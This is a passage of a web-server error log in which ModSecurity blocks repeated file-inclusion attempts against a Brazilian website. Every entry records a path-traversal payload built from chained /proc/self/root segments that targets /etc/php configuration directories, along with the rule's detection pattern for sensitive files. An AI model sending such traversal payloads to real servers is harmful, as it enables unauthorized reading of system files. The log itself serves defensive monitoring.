[Wed Mar 18 03:38:36.079932 2026] [:error] [pid 31803:tid 140411741927168] [client 74.7.243.128:33238] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpIbOyqAr6etmhZHNp2WQAAAEA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 03:38:38.801379 2026] [:error] [pid 15826:tid 140411574073088] [client 74.7.243.128:33250] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpIbeoXxyEfFpUF8f8rGQAAAVQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 03:38:40.184178 2026] [:error] [pid 17653:tid 140411708356352] [client 74.7.243.128:35574] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpIcMdf6f5d65gmYZSOTQAAAsQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 03:38:41.534411 2026] [:error] [pid 15826:tid 140411557287680] [client 74.7.243.128:35584] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpIceoXxyEfFpUF8f8rGgAAAVY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 03:38:53.878617 2026] [:error] [pid 30077:tid 140411574073088] [client 74.7.243.128:35592] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpIffu8EFLIOrSqIpvEzQAAAlQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 03:38:56.161874 2026] [:error] [pid 26799:tid 140411674785536] [client 74.7.243.128:52234] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpIgNa6ubjKNq_cu4ZTnwAAA0g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 03:38:57.563732 2026] [:error] [pid 11816:tid 140411582465792] [client 74.7.243.128:52236] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpIgew_le52K8_3pV2eYAAAAhM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 03:38:58.931946 2026] [:error] [pid 19507:tid 140411548894976] [client 74.7.243.128:52242] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpIgtY0UrI5A3LftIxPCwAAAZc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 03:39:05.929067 2026] [:error] [pid 26799:tid 140411683178240] [client 74.7.243.128:49718] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpIida6ubjKNq_cu4ZTsQAAA0c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 03:39:08.326671 2026] [:error] [pid 15051:tid 140411725141760] [client 74.7.243.128:49722] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpIjCmAPhZkrhU8w4ksFAAAAII"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 03:39:09.591267 2026] [:error] [pid 19507:tid 140411565680384] [client 74.7.243.128:58238] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpIjdY0UrI5A3LftIxPEgAAAZU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 03:39:21.439613 2026] [:error] [pid 19507:tid 140411683178240] [client 74.7.243.128:58252] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpImdY0UrI5A3LftIxPIgAAAYc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 03:39:22.764284 2026] [:error] [pid 11816:tid 140411691570944] [client 74.7.243.128:60790] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpImuw_le52K8_3pV2eZwAAAgY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 03:39:27.363204 2026] [:error] [pid 15051:tid 140411557287680] [client 74.7.243.128:60792] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpInymAPhZkrhU8w4ksHQAAAJY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 03:39:34.352791 2026] [:error] [pid 31803:tid 140411716749056] [client 74.7.243.128:60802] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpIpuyqAr6etmhZHNp2dQAAAEM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 03:39:35.659408 2026] [:error] [pid 26799:tid 140411725141760] [client 74.7.243.128:40472] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpIp9a6ubjKNq_cu4ZT2QAAA0I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 03:39:42.543485 2026] [:error] [pid 17887:tid 140411590858496] [client 74.7.243.128:40484] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpIrAkwaGbbGflqUZDRQwAAANI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 03:39:44.034977 2026] [:error] [pid 17653:tid 140411666392832] [client 74.7.243.128:45884] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpIsMdf6f5d65gmYZSOcwAAAsk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 03:39:46.527183 2026] [:error] [pid 31803:tid 140411691570944] [client 74.7.243.128:45888] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpIsuyqAr6etmhZHNp2eQAAAEY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 03:39:50.103183 2026] [:error] [pid 29882:tid 140411699963648] [client 74.7.243.128:45900] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpItkzinOy1jxa1j4fQHwAAAQU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 03:39:52.415631 2026] [:error] [pid 11816:tid 140411699963648] [client 74.7.243.128:50868] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpIuOw_le52K8_3pV2ebwAAAgU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 03:39:54.692134 2026] [:error] [pid 29882:tid 140411683178240] [client 74.7.243.128:50876] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] 